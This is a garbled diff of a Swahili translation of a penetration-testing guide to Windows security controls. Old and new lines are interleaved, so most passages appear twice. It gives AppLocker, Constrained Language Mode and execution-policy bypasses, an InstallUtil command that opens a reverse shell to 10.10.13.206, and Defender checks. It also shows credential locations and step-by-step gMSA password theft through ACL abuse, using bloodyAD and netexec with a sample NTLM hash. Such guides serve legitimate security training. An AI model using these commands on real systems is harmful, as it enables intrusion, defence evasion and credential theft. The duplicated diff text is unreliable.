- **DLL enforcement mara chache huwekwa** kutokana na mzigo wa ziada ambao inaweza kuweka kwenye mfumo, na kiasi cha majaribio kinachohitajika kuhakikisha hakuna kitu kitaharibika. Hivyo kutumia **DLLs kama backdoors kutasaidia kupita AppLocker**.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kupita AppLocker. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
- Kwa kawaida mafaili ya **zinazoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries pia yanaweza kusaidia kupitisha AppLocker.
- **Sheria zilizotengenezwa vibaya pia zinaweza kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda iitwayo `allowed`** mahali popote na itaruhusiwa.
- Mashirika pia mara nyingi hujikita katika **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini husahau kuhusu **mengine** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
- **DLL enforcement mara chache huwa imewezeshwa** kutokana na mzigo wa ziada inaweza kuweka kwenye mfumo, na wingi wa upimaji unaohitajika kuhakikisha hakuna kitu kitakachovunjika. Kwa hivyo kutumia **DLLs as backdoors** kutasaidia kupitisha AppLocker.
- Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) kutekeleza **Powershell** code katika mchakato wowote na kupitisha AppLocker. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Hifadhi ya Akida
## Credentials Storage
### Meneja wa Akaunti za Usalama (SAM)
### Security Accounts Manager (SAM)
Akida za ndani zipo katika faili hii, nywila zimepangwa.
Taarifa za kuingia za eneo zipo katika faili hii; nywila zimehashiwa.
### Mamlaka ya Usalama wa Mitaa (LSA) - LSASS
### Local Security Authority (LSA) - LSASS
**Akida** (zilizopangwa) zime **hifadhiwa** katika **kumbukumbu** ya mfumo huu kwa sababu za Usajili wa Moja.\
**LSA** inasimamia **sera ya usalama** ya ndani (sera ya nywila, ruhusa za watumiaji...), **uthibitishaji**, **tokens za ufikiaji**...\
LSA itakuwa ndiyo itakayofanya **ukaguzi** wa akida zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa ndani) na **kuzungumza** na **kikundi cha kudhibiti** ili kuthibitisha mtumiaji wa kikoa.
Taarifa za kuingia (zilizo hashed) zimeshifadhiwa katika kumbukumbu ya subsistemu hii kwa sababu za Single Sign-On.\
**LSA** inaendesha sera za **usalama wa eneo** (sera za nywila, ruhusa za watumiaji...), **authentication**, **access tokens**...\
LSA ndicho kitakachokagua cheti zilizotolewa ndani ya faili ya **SAM** (kwa kuingia kwa eneo) na kuzungumza na **domain controller** kuthibitisha mtumiaji wa domain.
**Akida** zime **hifadhiwa** ndani ya **mchakato wa LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufichuliwa kwa urahisi.
Taarifa za kuingia zimeshifadhiwa ndani ya mchakato **LSASS**: tiketi za Kerberos, hashes NT na LM, nywila zinazoweza kufunguliwa kwa urahisi.
### Siri za LSA
### LSA secrets
LSA inaweza kuhifadhi kwenye diski baadhi ya akida:
LSA inaweza kuhifadhi kwenye diski baadhi ya taarifa za kuingia:
- Nywila ya akaunti ya kompyuta ya Active Directory (kikundi cha kudhibiti kisichoweza kufikiwa).
- Nywila ya akaunti ya kompyuta ya Active Directory (domain controller isiyoweza kufikiwa).
- Nywila za akaunti za huduma za Windows
- Nywila za kazi zilizopangwa
- Zaidi (nywila za programu za IIS...)
### NTDS.dit
Ni hifadhidata ya Active Directory. Ipo tu katika Vikundi vya Kudhibiti.
Ni hifadhidata ya Active Directory. Ipo tu kwenye Domain Controllers.
## Defender
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika matoleo ya Windows Server. In **zuia** zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupita ulinzi huu**.
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender) ni Antivirus inayopatikana katika Windows 10 na Windows 11, na katika toleo za Windows Server. Inazuia zana za kawaida za pentesting kama **`WinPEAS`**. Hata hivyo, kuna njia za **kupitisha ulinzi huu**.
### Angalia
### Check
Ili kuangalia **hali** ya **Defender** unaweza kutekeleza cmdlet ya PS **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama inafanya kazi):
Ili kukagua **hali** ya **Defender** unaweza kutekeleza PS cmdlet **`Get-MpComputerStatus`** (angalia thamani ya **`RealTimeProtectionEnabled`** kujua kama imewezeshwa):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
@ -92,7 +92,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
Ili kuorodhesha unaweza pia kukimbia:
Kwa ajili ya kuorodhesha pia unaweza kuendesha:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -103,36 +103,37 @@ sc query windefend
```
## Encrypted File System (EFS)
EFS inalinda faili kupitia usimbaji, ikitumia **symmetric key** inayojulikana kama **File Encryption Key (FEK)**. Funguo hii inasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati usimbuaji unahitajika, **private key** inayolingana ya cheti cha kidijitali cha mtumiaji inatumika kusimbua FEK kutoka kwenye $EFS stream. Maelezo zaidi yanaweza kupatikana [hapa](https://en.wikipedia.org/wiki/Encrypting_File_System).
EFS inalinda faili kwa usimbaji, ikitumia **ufunguo wa simetriki** unaojulikana kama **File Encryption Key (FEK)**. Ufunguo huu unasimbwa kwa kutumia **public key** ya mtumiaji na kuhifadhiwa ndani ya $EFS **alternative data stream** ya faili iliyosimbwa. Wakati ufunguzi unahitajika, **private key** inayolingana ya cheti dijitali la mtumiaji inatumika kusimua FEK kutoka kwenye mfululizo wa $EFS. Maelezo zaidi yanaweza kupatikana [here](https://en.wikipedia.org/wiki/Encrypting_File_System).
**Mifano ya Usimbuaji bila kuanzishwa na mtumiaji** ni pamoja na:
**Madaraja ya kuyafungua bila kuanzishwa na mtumiaji** ni pamoja na:
- Wakati faili au folda zinahamishwa kwenye mfumo wa faili usio EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinapaswa kusimbuliwa moja kwa moja.
- Faili zilizofichwa zinazotumwa kupitia mtandao kupitia SMB/CIFS protocol zinapaswa kusimbuliwa kabla ya usafirishaji.
- Wakati faili au folda zinapotamishwa kwenda kwenye mfumo wa faili usio wa EFS, kama [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table), zinafutwa usimbaji kwa 자동.
- Faili zilizofichwa zinazotumwa kupitia mtandao kwa protokoli ya SMB/CIFS zinasimuliwa kabla ya kutumwa.
Njia hii ya usimbaji inaruhusu **upatikanaji wa wazi** kwa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha tu nenosiri la mmiliki na kuingia hakutaruhusu usimbuaji.
Njia hii ya usimbaji inaruhusu **ufikiaji wazi** wa faili zilizofichwa kwa mmiliki. Hata hivyo, kubadilisha nenosiri la mmiliki na kuingia tu hakutaruhusu kusimuliwa.
**Mambo Muhimu**:
**Mambo muhimu kukumbuka**:
- EFS inatumia FEK ya symmetric, iliyosimbwa kwa kutumia public key ya mtumiaji.
- Usimbuaji unatumia private key ya mtumiaji kupata FEK.
- Usimbuaji wa moja kwa moja unafanyika chini ya hali maalum, kama vile kunakili kwenye FAT32 au usafirishaji wa mtandao.
- EFS inatumia FEK wa simetriki, iliyosimbwa kwa public key ya mtumiaji.
- Kusimua kunatumia private key ya mtumiaji kupata FEK.
- Kusimuliwa kwa automatiki hutokea katika hali maalum, kama kunakopywa kwenye FAT32 au wakati wa usafirishaji wa mtandao.
- Faili zilizofichwa zinapatikana kwa mmiliki bila hatua za ziada.
### Angalia taarifa za EFS
### Check EFS info
Angalia kama **mtumiaji** amekuwa **akitumia** huduma hii kwa kuangalia kama njia hii inapatikana:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia kama **mtumiaji** ame **tumia** **huduma** hii kwa kukagua kama njia hii ipo:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Angalia **nani** ana **upatikanaji** wa faili kwa kutumia cipher /c \<file>\
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **kusimbua** na **kusimbua** faili zote
Check **who** has **access** to the file using cipher /c \<file>\
Unaweza pia kutumia `cipher /e` na `cipher /d` ndani ya folda ili **encrypt** na **decrypt** faili zote
### Kusimbua faili za EFS
### Decrypting EFS files
#### Kuwa Mamlaka ya Mfumo
#### Being Authority System
Njia hii inahitaji **mtumiaji wa kidhulumu** kuwa **akifanya** **mchakato** ndani ya mwenyeji. Ikiwa hiyo ni kesi, kwa kutumia `meterpreter` sessions unaweza kuiga token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenye mchakato wa mtumiaji.
Njia hii inahitaji **mtumiaji wa mwathiriwa** kuwa **anazungusha** **mchakato** ndani ya host. Ikiwa hivyo ndio hali, kwa kutumia session za `meterpreter` unaweza kujifanya token ya mchakato wa mtumiaji (`impersonate_token` kutoka `incognito`). Au unaweza tu `migrate` kwenda mchakato wa mtumiaji.
#### Knowing the users password
#### Kujua nenosiri la watumiaji
{{#ref}}
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
@ -140,29 +141,65 @@ https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
## Group Managed Service Accounts (gMSA)
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** ili kurahisisha usimamizi wa akaunti za huduma katika miundombinu ya IT. Tofauti na akaunti za huduma za jadi ambazo mara nyingi zina mipangilio ya "**Password never expire**" iliyoanzishwa, gMSAs hutoa suluhisho salama na linaloweza kusimamiwa zaidi:
Microsoft ilitengeneza **Group Managed Service Accounts (gMSA)** kurahisisha usimamizi wa akaunti za service katika miundombinu ya IT. Tofauti na akaunti za service za jadi ambazo mara nyingi zinawekwa na sifa ya "**Password never expire**", gMSA zinatoa suluhisho salama na rahisi kusimamia:
- **Usimamizi wa Nenosiri wa Moja kwa Moja**: gMSAs hutumia nenosiri tata la herufi 240 ambalo hubadilika moja kwa moja kulingana na sera ya kikoa au kompyuta. Mchakato huu unashughulikiwa na Huduma ya Usambazaji wa Funguo ya Microsoft (KDC), ikiondoa haja ya masasisho ya nenosiri ya mikono.
- **Usalama Ulioimarishwa**: Akaunti hizi hazihusiki na kufungwa na haziwezi kutumika kwa kuingia kwa mwingiliano, kuimarisha usalama wao.
- **Msaada wa Wenyeji Wengi**: gMSAs zinaweza kushirikiwa kati ya wenyeji wengi, na kuifanya kuwa bora kwa huduma zinazofanya kazi kwenye seva nyingi.
- **Uwezo wa Kazi Iliyopangwa**: Tofauti na akaunti za huduma zinazodhibitiwa, gMSAs zinasaidia kuendesha kazi zilizopangwa.
- **Usimamizi wa SPN ulio Rahisishwa**: Mfumo unasasisha moja kwa moja Jina la Kiongozi wa Huduma (SPN) wakati kuna mabadiliko katika maelezo ya sAMaccount ya kompyuta au jina la DNS, kuimarisha usimamizi wa SPN.
- **Automatic Password Management**: gMSA zinatumia nenosiri tata la herufi 240 ambalo hubadilika kiotomatiki kulingana na sera za domain au kompyuta. Mchakato huu unafanywa na Key Distribution Service (KDC) ya Microsoft, kuondoa hitaji la masasisho ya nenosiri kwa mikono.
- **Enhanced Security**: Akaunti hizi hazifikiriwi kwa lockouts na hazitumiwi kwa interactive logins, hivyo kuongeza usalama.
- **Multiple Host Support**: gMSA zinaweza kushirikiwa kati ya host nyingi, zikifanya kuwa bora kwa services zinazoendesha kwenye server nyingi.
- **Scheduled Task Capability**: Tofauti na managed service accounts, gMSA zinaunga mkono kuendesha scheduled tasks.
- **Simplified SPN Management**: Mfumo hubadilisha Service Principal Name (SPN) kiotomatiki wakati kuna mabadiliko kwa sAMaccount details za kompyuta au jina la DNS, kurahisisha usimamizi wa SPN.
Nenosiri za gMSAs zinahifadhiwa katika mali ya LDAP _**msDS-ManagedPassword**_ na zinarejeshwa moja kwa moja kila siku 30 na Wasimamizi wa Kikoa (DCs). Nenosiri hili, ambalo ni blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), linaweza kupatikana tu na wasimamizi walioidhinishwa na seva ambazo gMSAs zimewekwa, kuhakikisha mazingira salama. Ili kufikia taarifa hii, unahitaji muunganisho salama kama LDAPS, au muunganisho lazima uthibitishwe na 'Sealing & Secure'.
Nenosiri za gMSA zimetunzwa kwenye mali ya LDAP _**msDS-ManagedPassword**_ na hubadilishwa kiotomatiki kila siku 30 na Domain Controllers (DCs). Nenosiri hili, blob ya data iliyosimbwa inayojulikana kama [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e), inaweza kuonekana tu na wasimamizi walioidhinishwa na server zinazoweka gMSA, kuhakikisha mazingira salama. Ili kupata taarifa hii, inahitaji muunganisho uliolindwa kama LDAPS, au muunganisho lazima uwe authenticated na 'Sealing & Secure'.
![https://cube0x0.github.io/Relaying-for-gMSA/](../../images/asd1.png)
Unaweza kusoma nenosiri hili kwa [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
Unaweza kusoma nenosiri hili kwa kutumia [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
```
/GMSAPasswordReader --AccountName jkohler
```
[**Pata maelezo zaidi katika chapisho hili**](https://cube0x0.github.io/Relaying-for-gMSA/)
[**Find more info in this post**](https://cube0x0.github.io/Relaying-for-gMSA/)
Pia, angalia [web page](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kutekeleza **NTLM relay attack** ili **read** **password** ya **gMSA**.
### Kutumia vibaya mnyororo wa ACL kusoma password iliyosimamiwa ya gMSA (GenericAll -> ReadGMSAPassword)
Katika mazingira mengi, watumiaji wenye vigezo vya chini wanaweza kupitisha kwa siri za gMSA bila kuathiri DC kwa kutumia vibaya ACL za vitu zilizopangwa vibaya:
- Kundi unachosimamia (mfano, via GenericAll/GenericWrite) umepewa `ReadGMSAPassword` juu ya gMSA.
- Kwa kujiunga na kundi hilo, unapata haki ya read blob ya `msDS-ManagedPassword` ya gMSA kupitia LDAP na kupata NTLM credentials zinazotumika.
Mtiririko wa kawaida wa kazi:
1) Gundua njia kwa kutumia BloodHound na taja principals zako za foothold kama Owned. Angalia edges kama:
- GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
2) Jumuisha wewe mwenyewe katika kundi la kati unaolisimamia (mfano kwa bloodyAD):
```bash
bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
```
3) Soma neno la siri la gMSA linalosimamiwa kupitia LDAP na tengeneza hash ya NTLM. NetExec inafanya otomatiki uondoaji wa `msDS-ManagedPassword` na uongofu hadi NTLM:
```bash
# Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
# Account: mgtsvc$ NTLM: edac7f05cded0b410232b7466ec47d6f
```
4) Thibitisha kama gMSA ukitumia NTLM hash (plaintext haidingiki). Ikiwa akaunti iko katika Remote Management Users, WinRM itafanya kazi moja kwa moja:
```bash
# SMB / WinRM as the gMSA using the NT hash
netexec smb <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
```
Vidokezo:
- Usomaji wa LDAP wa `msDS-ManagedPassword` unahitaji sealing (mfano: LDAPS/sign+seal). Zana zinashughulikia hili moja kwa moja.
- gMSAs mara nyingi hupewa haki za ndani kama WinRM; thibitisha uanachama wa kikundi (mfano: Remote Management Users) ili kupanga lateral movement.
- Ikiwa unahitaji blob tu ili kuhesabu NTLM wewe mwenyewe, ona muundo wa MSDS-MANAGEDPASSWORD_BLOB.
Pia, angalia hii [ukurasa wa wavuti](https://cube0x0.github.io/Relaying-for-gMSA/) kuhusu jinsi ya kufanya **NTLM relay attack** ili **kusoma** **nenosiri** la **gMSA**.
## LAPS
**Local Administrator Password Solution (LAPS)**, inayopatikana kwa kupakuliwa kutoka [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nenosiri za Msimamizi wa ndani. Nenosiri haya, ambayo ni **ya nasibu**, ya kipekee, na **yanabadilishwa mara kwa mara**, yanahifadhiwa kwa kati katika Active Directory. Upatikanaji wa nenosiri haya umewekwa vizuizi kupitia ACLs kwa watumiaji walioidhinishwa. Kwa ruhusa ya kutosha, uwezo wa kusoma nenosiri za msimamizi wa ndani unapatikana.
The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), inaruhusu usimamizi wa nywila za Administrator wa mkoa. Nywila hizi, ambazo ni **zilizoanzishwa kwa nasibu**, za kipekee, na **zinabadilishwa mara kwa mara**, zinahifadhiwa kati katika Active Directory. Upatikanaji wa nywila hizi umefungwa kupitia ACLs kwa watumiaji walioteuliwa. Ikiwa ruhusa za kutosha zimepewa, uwezo wa kusoma nywila za admin wa mkoa unapatikana.
{{#ref}}
../active-directory-methodology/laps.md
@ -170,20 +207,20 @@ Pia, angalia hii [ukurasa wa wavuti](https://cube0x0.github.io/Relaying-for-gMSA
## PS Constrained Language Mode
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inafungia mbali vipengele vingi** vinavyohitajika kutumia PowerShell kwa ufanisi, kama vile kuzuia vitu vya COM, kuruhusu tu aina za .NET zilizothibitishwa, michakato ya XAML, madarasa ya PowerShell, na zaidi.
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **inazuia vipengele vingi** vinavyohitajika ili kutumia PowerShell kwa ufanisi, kama kuzuia COM objects, kuruhusu tu aina za .NET zilizokubaliwa, XAML-based workflows, PowerShell classes, na zaidi.
### **Angalia**
### **Kagua**
```bash
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Kupita
### Kuvuka
```bash
#Easy bypass
Powershell -version 2
```
Katika Windows ya sasa, Bypass hiyo haitafanya kazi lakini unaweza kutumia [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikamilisha unahitaji** **ku** _**ongeza Rejeleo**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha mradi kuwa .Net4.5**.
Kwenye Windows za sasa bypass hiyo haitafanya kazi lakini unaweza kutumia [ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM).\
**Ili kuikompaila unaweza kuhitaji** **kufanya** _**Add a Reference**_ -> _Browse_ -> _Browse_ -> ongeza `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` na **badilisha project kuwa .Net4.5**.
#### Bypass ya moja kwa moja:
```bash
@ -193,11 +230,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** msimbo katika mchakato wowote na kupita njia iliyozuiliwa. Kwa maelezo zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
Unaweza kutumia [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) au [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) ili **kutekeleza Powershell** code katika mchakato wowote na kuepuka constrained mode. Kwa taarifa zaidi angalia: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-constrained-language-mode).
## Sera ya Utekelezaji wa PS
## Sera ya Utekelezaji ya PS
Kwa default imewekwa kuwa **imezuiliwa.** Njia kuu za kupita sera hii:
Kwa chaguo-msingi imewekwa kuwa **restricted.** Njia kuu za kuepuka sera hii:
```bash
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@ -217,36 +254,42 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
Zaidi zinaweza kupatikana [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
## Security Support Provider Interface (SSPI)
Ni API inayoweza kutumika kuthibitisha watumiaji.
Ni API inayotumika kuthibitisha watumiaji.
SSPI itakuwa na jukumu la kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki ipi ya uthibitishaji itakayokuwa inatumika, hizi itifaki za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kwa njia ya DLL na mashine zote mbili zinapaswa kuunga mkono ile ile ili kuweza kuwasiliana.
SSPI itawajibika kutafuta itifaki inayofaa kwa mashine mbili zinazotaka kuwasiliana. Njia inayopendekezwa kwa hili ni Kerberos. Kisha SSPI itajadili itifaki gani ya uthibitishaji itakayotumika; itifaki hizi za uthibitishaji zinaitwa Security Support Provider (SSP), ziko ndani ya kila mashine ya Windows kama DLL na mashine zote mbili lazima ziunge mkono ile ile ili ziweze kuwasiliana.
### Main SSPs
### SSP kuu
- **Kerberos**: Ile inayopendekezwa
- **Kerberos**: Inayopendekezwa
- %windir%\Windows\System32\kerberos.dll
- **NTLMv1** na **NTLMv2**: Sababu za ulinganifu
- **NTLMv1** and **NTLMv2**: Sababu za utangamano
- %windir%\Windows\System32\msv1_0.dll
- **Digest**: Seva za wavuti na LDAP, nywila kwa njia ya MD5 hash
- **Digest**: Web servers na LDAP, nenosiri kwa fomu ya MD5 hash
- %windir%\Windows\System32\Wdigest.dll
- **Schannel**: SSL na TLS
- **Schannel**: SSL and TLS
- %windir%\Windows\System32\Schannel.dll
- **Negotiate**: Inatumika kujadili itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo la msingi)
- **Negotiate**: Inatumika kujadiliana itifaki ya kutumia (Kerberos au NTLM, Kerberos ikiwa chaguo-msingi)
- %windir%\Windows\System32\lsasrv.dll
#### The negotiation could offer several methods or only one.
#### Mazungumzo yanaweza kutoa njia kadhaa au njia moja tu.
## UAC - User Account Control
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **kuonyeshwa kwa idhini kwa shughuli zilizoimarishwa**.
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) ni kipengele kinachowezesha **maombi ya idhini kwa shughuli zinazohitaji ruhusa ya juu**.
{{#ref}}
uac-user-account-control.md
{{#endref}}
## Marejeo
- [Relaying for gMSA cube0x0](https://cube0x0.github.io/Relaying-for-gMSA/)
- [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)
- [HTB Sendai 0xdf: gMSA via rights chaining to WinRM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
{{#include ../../banners/hacktricks-training.md}}